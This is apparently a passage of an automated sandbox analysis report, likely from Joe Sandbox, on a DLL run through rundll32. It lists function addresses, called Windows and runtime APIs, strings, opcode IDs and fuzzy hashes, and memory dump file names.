                                                                                                                      • API String ID: 3213498283-0
                                                                                                                      • Opcode ID: 8a0385260425eac13c0282f20728e3bbfc1285cc9f071ecdbaf24b125922a9d1
                                                                                                                      • Instruction ID: c5565e2f16380d72d7548de1307714f0aeebb69643ec4dea90e42c6edbedab58
                                                                                                                      • Opcode Fuzzy Hash: 8a0385260425eac13c0282f20728e3bbfc1285cc9f071ecdbaf24b125922a9d1
                                                                                                                      • Instruction Fuzzy Hash: 6C51AD32311A9985EBA2CF55E5443BA73A1F35DBC6F80C421EBC947794EE38CA99C305
                                                                                                                      Function 0000000180005AC0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77registrylibraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleW.KERNEL32(?,?,?,?,00000000,00000000,?,?,00000000,?,0000000180006033), ref: 0000000180005B04
                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,?,00000000,00000000,?,?,00000000,?,0000000180006033), ref: 0000000180005B1E
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,?,?,00000000,00000000,?,?,00000000,?,0000000180006033), ref: 0000000180005B73
                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,00000000,00000000,?,?,00000000,?,0000000180006033), ref: 0000000180005B85
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressCloseHandleModuleOpenProc
                                                                                                                      • String ID: Advapi32.dll$RegOpenKeyTransactedW
                                                                                                                      • API String ID: 823179699-3913318428
                                                                                                                      • Opcode ID: 922714fbc4fef7bdb830a90e38b00d6c7a05fef562a286103f241e5dee24232f
                                                                                                                      • Instruction ID: 61b866c1fd90337073b630c2583ef30057e813e73abd5604f95426379a943905
                                                                                                                      • Opcode Fuzzy Hash: 922714fbc4fef7bdb830a90e38b00d6c7a05fef562a286103f241e5dee24232f
                                                                                                                      • Instruction Fuzzy Hash: D821A232306B4C86EAA7CF16E8907AA73A4F74DBD1F948025EE8D47750EF38D6588704
                                                                                                                      Function 0000000180020A3C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                      • String ID: CONOUT$
                                                                                                                      • API String ID: 3230265001-3130406586
                                                                                                                      • Opcode ID: 9179611ce3d484bf7bb4d4f21fcbf0be3f337a48b181afc3d324849406284af3
                                                                                                                      • Instruction ID: db18f07911addb29b59b596a7c76d3ab734cd9017018912672b507ce7878bdb4
                                                                                                                      • Opcode Fuzzy Hash: 9179611ce3d484bf7bb4d4f21fcbf0be3f337a48b181afc3d324849406284af3
                                                                                                                      • Instruction Fuzzy Hash: 0E11B232310B4486E7938B52E85436A77A0F78CFE5F548224FE5987794DF38C6588744
                                                                                                                      Function 0000000180022D60 Relevance: 10.1, APIs: 8, Instructions: 112memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$FreeProcess$Value
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3709577838-0
                                                                                                                      • Opcode ID: c2b7db977e228d9729f835ee7e92fe8bed6556478dabf7a88b521e16d3e3cd68
                                                                                                                      • Instruction ID: 5750590dc8374900778181883ec944de8777c21cb0820c29f01a0902723758eb
                                                                                                                      • Opcode Fuzzy Hash: c2b7db977e228d9729f835ee7e92fe8bed6556478dabf7a88b521e16d3e3cd68
                                                                                                                      • Instruction Fuzzy Hash: 01416535202B4892EE979B65D5503A9A371FB8DFE1F59C225EF6E077A4DF38C5098300
                                                                                                                      Function 0000000180014DC4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                      • Opcode ID: c970d15527f8f6e660b5234528be61620e9f73803ea0b4106ac94b8a677c7c66
                                                                                                                      • Instruction ID: 097023b2cbdfde49c40b6fd13eaac2af1dcb66600fa14bccd34a4fbafceb32a9
                                                                                                                      • Opcode Fuzzy Hash: c970d15527f8f6e660b5234528be61620e9f73803ea0b4106ac94b8a677c7c66
                                                                                                                      • Instruction Fuzzy Hash: DCF05E71312A08C1FF878B51E8903A923A0BF8CBD1F849416B94B46564DF78C68CC754
                                                                                                                      Function 000000018001F5E8 Relevance: 7.7, APIs: 5, Instructions: 203COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 000000018001F629
                                                                                                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000018001F5A7,?,?,?,000000018001B29B), ref: 000000018001F6E8
                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000018001F5A7,?,?,?,000000018001B29B), ref: 000000018001F768
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2210144848-0
                                                                                                                      • Opcode ID: ae99e38dd02a7261c2c6d0b8c86bc1feb708f17d4f9d531f33e9b478c84040dc
                                                                                                                      • Instruction ID: 43e1545d8c5255d8e9e05e60bcd817678180781a84b7e28a742c8e887bc3ca2c
                                                                                                                      • Opcode Fuzzy Hash: ae99e38dd02a7261c2c6d0b8c86bc1feb708f17d4f9d531f33e9b478c84040dc
                                                                                                                      • Instruction Fuzzy Hash: 5381AC36614E0899FBA6AB6588907FD27A0F74CBD8F44C216FE0A537E6DF348649C710
                                                                                                                      Function 000000018000AF50 Relevance: 7.7, APIs: 5, Instructions: 170COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalDeleteSection
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 166494926-0
                                                                                                                      • Opcode ID: 5373f7ee083048d533c2520517f7528c1624526d471f4ab200540c9a635c08b2
                                                                                                                      • Instruction ID: dd4fd535904e7d2e3bf020242418357b7c47115a4b5646b1bba01b7941aee057
                                                                                                                      • Opcode Fuzzy Hash: 5373f7ee083048d533c2520517f7528c1624526d471f4ab200540c9a635c08b2
                                                                                                                      • Instruction Fuzzy Hash: 2B715E76205A4982EBA2CF11E4503EA73A1F748BD4F44C121FF5A87B94DF38CA99CB40
                                                                                                                      Function 00000001800204A4 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _set_statfp
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1156100317-0
                                                                                                                      • Opcode ID: c8fa3015a8f78404e409fe4dc9b2444ced030e897441c29de37c84fe9791c269
                                                                                                                      • Instruction ID: ee68135ad0318bf899fcee127a736d73ab127c04b409baee4b92e69e90382910
                                                                                                                      • Opcode Fuzzy Hash: c8fa3015a8f78404e409fe4dc9b2444ced030e897441c29de37c84fe9791c269
                                                                                                                      • Instruction Fuzzy Hash: 25118672A50F2D06F6E72124E5453EA23416F5C3F4F74C635BB76066EB8F688B494710
                                                                                                                      Function 0000000180012930 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                      • String ID: $*
                                                                                                                      • API String ID: 3215553584-3982473090
                                                                                                                      • Opcode ID: 9186edf46071ac7533fb7cf782ed455da096df7baf0855607552a5d5df96310d
                                                                                                                      • Instruction ID: 125fdf878ed4e9d4e426cfd5b2beb0a108ce8d10c15bd92bf3be489b5dcf0de5
                                                                                                                      • Opcode Fuzzy Hash: 9186edf46071ac7533fb7cf782ed455da096df7baf0855607552a5d5df96310d
                                                                                                                      • Instruction Fuzzy Hash: AD619572114A48CBE7FB8F2884583ED3BA1F71DB89F589115E642422D9EF34C6A9C712
                                                                                                                      Function 0000000180017B48 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 134COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                      • String ID: -$e+000$gfff
                                                                                                                      • API String ID: 3215553584-2620144452
                                                                                                                      • Opcode ID: 89bcca44b9417b92e0e855a4c2a87eb63b9814be5d57bd85a874d2708c334544
                                                                                                                      • Instruction ID: 13859a5dffa2dfe0d72762436a3d161302fe7da5c4d514db1a47257b8f061b63
                                                                                                                      • Opcode Fuzzy Hash: 89bcca44b9417b92e0e855a4c2a87eb63b9814be5d57bd85a874d2708c334544
                                                                                                                      • Instruction Fuzzy Hash: 1151F872714BC886E7A68F39D8413D97BA1E389BD0F48D225E79847BD6DF28C648C701
                                                                                                                      Function 0000000180008970 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                      • String ID: type_error
                                                                                                                      • API String ID: 3668304517-1406221190
                                                                                                                      • Opcode ID: b058222c2227ea872afc5b32253dd9d732f9db9df698ff926845857dbda95bdf
                                                                                                                      • Instruction ID: 50e7e856241c09585bb2cc6510c892539a9e3a75e16386a5cbf54137d8a88b63
                                                                                                                      • Opcode Fuzzy Hash: b058222c2227ea872afc5b32253dd9d732f9db9df698ff926845857dbda95bdf
                                                                                                                      • Instruction Fuzzy Hash: C1518372615B8881FA56CB28E45539A7361FB8D7E4F509311FAAC43BDADF78C288C700
                                                                                                                      Function 0000000180008780 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                      • String ID: other_error
                                                                                                                      • API String ID: 3668304517-896093151
                                                                                                                      • Opcode ID: 5ba4ad6ed8a819c74eaac1de025b926ab0507947bee0665e1cccbb221e2935cc
                                                                                                                      • Instruction ID: 4fd34da277bcb81ba046d36130df483134f3035bbd1b9093707cb17488f3b066
                                                                                                                      • Opcode Fuzzy Hash: 5ba4ad6ed8a819c74eaac1de025b926ab0507947bee0665e1cccbb221e2935cc
                                                                                                                      • Instruction Fuzzy Hash: 14518F72614B8881EA56DB28E44539A7361FB897E4F50D311FAAC436EADF78C288C700
                                                                                                                      Function 0000000180012B3C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 171COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                      • String ID: *
                                                                                                                      • API String ID: 3215553584-163128923
                                                                                                                      • Opcode ID: 0001f2f73bd4214c56874a2a435943038f335403b12da021ec391d38b407e24e
                                                                                                                      • Instruction ID: d001ba0e656f52b9c6e5173e784844ecc945baa90473546c5ec452aaff2b905b
                                                                                                                      • Opcode Fuzzy Hash: 0001f2f73bd4214c56874a2a435943038f335403b12da021ec391d38b407e24e
                                                                                                                      • Instruction Fuzzy Hash: 6E719272104A1886E7EA8F28D0443EC3BB0F30DF98F249116EF4642399EF70C6AAD754
                                                                                                                      Function 0000000180002900 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 118COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180002A64
                                                                                                                      • _CxxThrowException.LIBVCRUNTIME ref: 0000000180002AB6
                                                                                                                        • Part of subcall function 000000018000EB58: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000018000E45B), ref: 000000018000EBCD
                                                                                                                        • Part of subcall function 000000018000EB58: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000018000E45B), ref: 000000018000EBFF
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Exception$FileHeaderRaiseThrow_invalid_parameter_noinfo_noreturn
                                                                                                                      • String ID: cannot use operator[] with a string argument with
                                                                                                                      • API String ID: 1611749442-2766135566
                                                                                                                      • Opcode ID: a7add5ded4a20cda95b4b3d60da19fa7128c3acf4876b3aa335c0ca9d770390e
                                                                                                                      • Instruction ID: a30ffc925e730f63cc89c35fc74b905e988506043f62fa4a043d6612cf840508
                                                                                                                      • Opcode Fuzzy Hash: a7add5ded4a20cda95b4b3d60da19fa7128c3acf4876b3aa335c0ca9d770390e
                                                                                                                      • Instruction Fuzzy Hash: 6641B272204AC891EA92DB25E5103DE7761F78D7E0F549212FBAD07ADADF68C689C700
                                                                                                                      Function 000000018001F38C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                                      • String ID: U
                                                                                                                      • API String ID: 442123175-4171548499
                                                                                                                      • Opcode ID: 2f6bac117e9c64a28ee378ede8fe7d4062f245215970e72067292429a2ecbe3c
                                                                                                                      • Instruction ID: e9215d547afdfb7ae36bb631c58771267b4e59003a7ed33eb167d21669a8df37
                                                                                                                      • Opcode Fuzzy Hash: 2f6bac117e9c64a28ee378ede8fe7d4062f245215970e72067292429a2ecbe3c
                                                                                                                      • Instruction Fuzzy Hash: 95418272715A4882EBA18F65E8443EA7761F7987D4F858021FE8D87798DF3CC649C740
                                                                                                                      Function 000000018001AA90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Stringtry_get_function
                                                                                                                      • String ID: LCMapStringEx
                                                                                                                      • API String ID: 2588686239-3893581201
                                                                                                                      • Opcode ID: aa136470c04f54750922b3b7d9728b3fa1d52aa7221cecf1e4fbf481d35cdd9f
                                                                                                                      • Instruction ID: 1426e9033e083328d810d4c964af1471415f2e4abc38788602fc3b5fa8da82aa
                                                                                                                      • Opcode Fuzzy Hash: aa136470c04f54750922b3b7d9728b3fa1d52aa7221cecf1e4fbf481d35cdd9f
                                                                                                                      • Instruction Fuzzy Hash: 0D11F736608B8486D7A2CB56B4803DAB7A5F7CDBD0F548126EE8D83B59DF38C6448B00
                                                                                                                      Function 000000018001AA2C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                                                                                      • String ID: InitializeCriticalSectionEx
                                                                                                                      • API String ID: 539475747-3084827643
                                                                                                                      • Opcode ID: 3f45dbee98766fe5468453c05f38d203438228ec095d9aa51e92474b39c22aad
                                                                                                                      • Instruction ID: b60cf378d3302ced2315405eddc9469e8ecac8c086673f686eb128210d48837b
                                                                                                                      • Opcode Fuzzy Hash: 3f45dbee98766fe5468453c05f38d203438228ec095d9aa51e92474b39c22aad
                                                                                                                      • Instruction Fuzzy Hash: 83F05E35205B8881FB878B82B5407E52364BB4DBC0F88D025F95A03B54CF38C64DC744
                                                                                                                      Function 000000018001A9D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 000000018001AA01
                                                                                                                      • TlsSetValue.KERNEL32(?,?,0000EABB3B49FBAC,0000000180016B42,?,?,0000EABB3B49FBAC,0000000180011C25,?,?,?,?,0000000180016D36,?,?,00000000), ref: 000000018001AA18
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Valuetry_get_function
                                                                                                                      • String ID: FlsSetValue
                                                                                                                      • API String ID: 738293619-3750699315
                                                                                                                      • Opcode ID: fe28caa2cce135917cb9ddf218cb5b10bc14cf2eff41ae8af3362b4de2454d38
